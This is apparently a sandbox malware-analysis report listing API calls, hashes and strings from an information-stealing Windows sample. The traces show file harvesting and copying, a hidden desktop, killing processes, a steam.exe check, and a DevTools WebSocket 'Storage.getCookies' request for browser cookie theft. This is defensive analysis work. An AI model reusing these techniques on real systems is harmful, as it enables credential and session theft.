                                    • CloseHandle.KERNEL32(00000000), ref: 008DCF3F
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008DCF54
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DCF94
                                    • FindNextFileA.KERNEL32(?,?), ref: 008DD08D
                                    • FindClose.KERNEL32(?), ref: 008DD09F
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                                    • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                                    • API String ID: 3860919712-2388001722
                                    • Opcode ID: 732a33a4b29b8c64a76a150a34870b1f84f03a53543475984e60b2c1540e1486
                                    • Instruction ID: 21064f99d4d643679cd5eafd3a0aeb307439203a05e4f9755f43ae0da093a261
                                    • Opcode Fuzzy Hash: 732a33a4b29b8c64a76a150a34870b1f84f03a53543475984e60b2c1540e1486
                                    • Instruction Fuzzy Hash: 8CC13D71A00219AFDB50EFA4DC49EEE7779FF88300F004599F509E7290DE74AA85CB91
                                    APIs
                                    • wsprintfA.USER32 ref: 008DE353
                                    • FindFirstFileA.KERNEL32(?,?), ref: 008DE369
                                    • StrCmpCA.SHLWAPI(?,008F1D68), ref: 008DE388
                                    • StrCmpCA.SHLWAPI(?,008F1D6C), ref: 008DE3A0
                                    • wsprintfA.USER32 ref: 008DE3C7
                                    • StrCmpCA.SHLWAPI(?,008ED014), ref: 008DE3DC
                                    • wsprintfA.USER32 ref: 008DE3F8
                                      • Part of subcall function 008DEF30: lstrcpy.KERNEL32(00000000,?), ref: 008DEF62
                                    • wsprintfA.USER32 ref: 008DE416
                                    • PathMatchSpecA.SHLWAPI(?,?), ref: 008DE42B
                                    • lstrcat.KERNEL32(?,0053E848), ref: 008DE460
                                    • lstrcat.KERNEL32(?,008F1D5C), ref: 008DE473
                                    • lstrcat.KERNEL32(?,?), ref: 008DE488
                                    • lstrcat.KERNEL32(?,008F1D5C), ref: 008DE49B
                                    • lstrcat.KERNEL32(?,?), ref: 008DE4B1
                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 008DE4C6
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DE4FF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DE553
                                    • DeleteFileA.KERNEL32(?), ref: 008DE594
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C1437
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C1459
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C147B
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C14DF
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 008DE5D9
                                    • FindClose.KERNEL32(00000000), ref: 008DE5E8
                                    Strings
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                    • String ID: %s\%s$%s\*$HS
                                    • API String ID: 1375681507-1316326243
                                    • Opcode ID: 616dad2da04b20162aef9fb8ad2b02fa425d7307156d363a9f53242cc613c09e
                                    • Instruction ID: a600fbdcfa512318301882f57275fb614b5281788bc32a98bee37185004954f6
                                    • Opcode Fuzzy Hash: 616dad2da04b20162aef9fb8ad2b02fa425d7307156d363a9f53242cc613c09e
                                    • Instruction Fuzzy Hash: 0F814D715147459BCB20EBB4DC49EAB77B9FB88304F00891DB699C7291EE34D909CBA2
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 008DDE68
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008DDE6F
                                    • wsprintfA.USER32 ref: 008DDE87
                                    • FindFirstFileA.KERNEL32(?,?), ref: 008DDEA0
                                    • StrCmpCA.SHLWAPI(?,008F1D68), ref: 008DDEBE
                                    • StrCmpCA.SHLWAPI(?,008F1D6C), ref: 008DDED9
                                    • wsprintfA.USER32 ref: 008DDEF9
                                    • DeleteFileA.KERNEL32(?), ref: 008DDF4D
                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 008DDF14
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C1437
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C1459
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C147B
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C14DF
                                      • Part of subcall function 008DDAA0: memset.MSVCRT ref: 008DDAC1
                                      • Part of subcall function 008DDAA0: memset.MSVCRT ref: 008DDAD3
                                      • Part of subcall function 008DDAA0: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 008DDAFB
                                      • Part of subcall function 008DDAA0: lstrcpy.KERNEL32(00000000,?), ref: 008DDB2E
                                      • Part of subcall function 008DDAA0: lstrcat.KERNEL32(?,00000000), ref: 008DDB3C
                                      • Part of subcall function 008DDAA0: lstrcat.KERNEL32(?,0053E4C0), ref: 008DDB56
                                      • Part of subcall function 008DDAA0: lstrcat.KERNEL32(?,?), ref: 008DDB6A
                                      • Part of subcall function 008DDAA0: lstrcat.KERNEL32(?,0053D0D0), ref: 008DDB7E
                                      • Part of subcall function 008DDAA0: lstrcpy.KERNEL32(00000000,?), ref: 008DDBAE
                                      • Part of subcall function 008DDAA0: GetFileAttributesA.KERNEL32(00000000), ref: 008DDBB5
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 008DDF5C
                                    • FindClose.KERNEL32(00000000), ref: 008DDF6B
                                    • lstrcat.KERNEL32(?,0053E848), ref: 008DDF92
                                    • lstrcat.KERNEL32(?,0053DA10), ref: 008DDFA4
                                    • lstrlen.KERNEL32(?), ref: 008DDFAF
                                    • lstrlen.KERNEL32(?), ref: 008DDFBE
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DDFF4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                     • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                                    • String ID: %s\%s$%s\*$HS
                                    • API String ID: 4184593125-1316326243
                                    • Opcode ID: c6cfc0adf89e73fd4242eb4fda6f20dcabd496ee52d5d377e6c1e463ee169a3e
                                    • Instruction ID: ae6183544ef74b0c09064cb315a56ca56fd545c158f5c94c00e8f11d67a87c6f
                                    • Opcode Fuzzy Hash: c6cfc0adf89e73fd4242eb4fda6f20dcabd496ee52d5d377e6c1e463ee169a3e
                                    • Instruction Fuzzy Hash: A35129715143449BC720EFB8D849EAB77A9FB88315F004A29F999C7290EF34D909CB92
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C15E2
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C1619
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C166C
                                    • lstrcat.KERNEL32(00000000), ref: 008C1676
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C16A2
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C17F3
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008C17FE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                     • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat
                                    • String ID: \*.*
                                    • API String ID: 2276651480-1173974218
                                    • Opcode ID: 8ff2e86d76e4de72ddfbb3b9ac4c8f1dd8000f5f1f04586ef6da73d7b29dcdd4
                                    • Instruction ID: d34f2b2a2e2582169dfe1eea97f6ae3283331cd27f6a46db7ece2d309ff017ad
                                    • Opcode Fuzzy Hash: 8ff2e86d76e4de72ddfbb3b9ac4c8f1dd8000f5f1f04586ef6da73d7b29dcdd4
                                    • Instruction Fuzzy Hash: 3181F87191161A9BCB11EFA8C989FAE7BB8FF45700F040128F905E7292DB34DD16CB92
                                    APIs
                                    • wsprintfA.USER32 ref: 008DD65D
                                    • FindFirstFileA.KERNEL32(?,?), ref: 008DD674
                                    • StrCmpCA.SHLWAPI(?,008F1D68), ref: 008DD694
                                    • StrCmpCA.SHLWAPI(?,008F1D6C), ref: 008DD6AE
                                    • lstrcat.KERNEL32(?,0053E848), ref: 008DD6F3
                                    • lstrcat.KERNEL32(?,0053E8F8), ref: 008DD707
                                    • lstrcat.KERNEL32(?,?), ref: 008DD71B
                                    • lstrcat.KERNEL32(?,?), ref: 008DD72C
                                    • lstrcat.KERNEL32(?,008F1D5C), ref: 008DD73E
                                    • lstrcat.KERNEL32(?,?), ref: 008DD752
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DD792
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DD7E2
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 008DD847
                                    • FindClose.KERNEL32(00000000), ref: 008DD856
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                     • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                                    • String ID: %s\%s$HS
                                    • API String ID: 50252434-1860949076
                                    • Opcode ID: e865c28428a4f471613a820eb3a672a557f56ba4b35604ce6086c36db246abf3
                                    • Instruction ID: 36726fe8acd62c7cb5a60e402f12ee1c75113029751791d8225726286dcabcfe
                                    • Opcode Fuzzy Hash: e865c28428a4f471613a820eb3a672a557f56ba4b35604ce6086c36db246abf3
                                    • Instruction Fuzzy Hash: A9612175910219ABCB10EBB4CC88AEE7BB9FF48300F0085A9E649D7251DB34EA55CF90
                                    APIs
                                    • CreateDesktopA.USER32(?), ref: 008C9888
                                    • lstrcat.KERNEL32(?,?), ref: 008C98BB
                                    • lstrcat.KERNEL32(?,?), ref: 008C98CD
                                    • lstrcat.KERNEL32(?,008F5128), ref: 008C98DD
                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 008C991A
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C9950
                                    • StrStrA.SHLWAPI(?,0053DF98), ref: 008C9965
                                    • lstrcpyn.KERNEL32(00AF93D0,?,00000000), ref: 008C9982
                                    • lstrlen.KERNEL32(?), ref: 008C9996
                                    • wsprintfA.USER32 ref: 008C99A6
                                    • lstrcpy.KERNEL32(?,?), ref: 008C99BD
                                    • Sleep.KERNEL32(00001388), ref: 008C9A41
                                    • CloseDesktop.USER32(?), ref: 008C9A81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                     • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Desktoplstrcpy$CloseCreateFolderPathSleeplstrcpynlstrlenwsprintf
                                    • String ID: %s%s$D
                                    • API String ID: 649207557-433275411
                                    • Opcode ID: 51e3cf304756a5ec2949b357fd558c369c2942d007cac92342d40e1930d0135d
                                    • Instruction ID: 09cfacdc24db230dc24393d991bed3ffe5b772e21675138ac54c116cf2e6e010
                                    • Opcode Fuzzy Hash: 51e3cf304756a5ec2949b357fd558c369c2942d007cac92342d40e1930d0135d
                                    • Instruction Fuzzy Hash: 72612F71114344AFE720DBB8DC45FAB77A8FF84700F10451DB689CB291DA74D909CB96
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                     • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Xinvalid_argumentstd::_
                                    • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                                    • API String ID: 909987262-758292691
                                    • Opcode ID: 5173fcc930eb97782432e505515c85720d70ac4a22c2d16822c8f9ad384a5df5
                                    • Instruction ID: a1146bebc8febe9d91a4f1b1319a82bdd7416a0d026c330f2c4a673f9072dec6
                                    • Opcode Fuzzy Hash: 5173fcc930eb97782432e505515c85720d70ac4a22c2d16822c8f9ad384a5df5
                                    • Instruction Fuzzy Hash: 95A24671D012A99FDB20DBA9C8807EDBBB6FF49304F1481AAD508E7241DB749E85CF91
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D2774
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D2797
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D27A2
                                    • lstrlen.KERNEL32(\*.*), ref: 008D27AD
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D27CA
                                    • lstrcat.KERNEL32(00000000,\*.*), ref: 008D27D6
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D280A
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 008D2826
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                     • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                    • String ID: \*.*
                                    • API String ID: 2567437900-1173974218
                                    • Opcode ID: e685e5232c55a758db4878e5eb0d8b6ffb6b1af3a582ee3ec84b5275fe229d67
                                    • Instruction ID: 811a25daf8eae9945520c6e555066c25a09daaf25ec02693b7162197d5cbda33
                                    • Opcode Fuzzy Hash: e685e5232c55a758db4878e5eb0d8b6ffb6b1af3a582ee3ec84b5275fe229d67
                                    • Instruction Fuzzy Hash: 77410A31511A599BCB21EF78CC85FAE7BB4FF44310F044269B948D62A1CF34DC1A8B92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                     • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: %<~m$*=^$?q_{$F-=z$SHO}$ZkVw$_9W>$gK$r^o|$z&/
                                    • API String ID: 0-1769550387
                                    • Opcode ID: 92a5e6255002fd51c2e26c6905cb96a7c7e3624b53e6432bff4c79cbdc8cad4c
                                    • Instruction ID: 2107abbfee052679a5ce6221b0bec1e70635fffda7c9b6137a7ebc46cdfc2717
                                    • Opcode Fuzzy Hash: 92a5e6255002fd51c2e26c6905cb96a7c7e3624b53e6432bff4c79cbdc8cad4c
                                    • Instruction Fuzzy Hash: 44B227F39082149FE3046E2DDC4567ABBE5EF94720F1A493DEAC5D3744EA3598048786
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008E46D9
                                    • Process32First.KERNEL32(00000000,00000128), ref: 008E46E9
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 008E46FB
                                    • StrCmpCA.SHLWAPI(?), ref: 008E470D
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008E4722
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 008E4731
                                    • CloseHandle.KERNEL32(00000000), ref: 008E4738
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 008E4746
                                    • CloseHandle.KERNEL32(00000000), ref: 008E4751
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                    • String ID:
                                    • API String ID: 3836391474-0
                                    • Opcode ID: 3725817719cf8b3f6f90730303c76ce0b5c2b1f55fd3e4a51a16d36146f33616
                                    • Instruction ID: 0b9eea06cf63248d5a75b7e3836e03d89bb8fe2b0c3d404e9722425bc870f21a
                                    • Opcode Fuzzy Hash: 3725817719cf8b3f6f90730303c76ce0b5c2b1f55fd3e4a51a16d36146f33616
                                    • Instruction Fuzzy Hash: E1018031601118ABE7219BE1DC8DFFB377CEB4AB51F000199F909D5180EF789986CBA1
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 008E4648
                                    • Process32First.KERNEL32(00000000,00000128), ref: 008E4658
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 008E466A
                                    • StrCmpCA.SHLWAPI(?,steam.exe), ref: 008E4680
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 008E4692
                                    • CloseHandle.KERNEL32(00000000), ref: 008E469D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
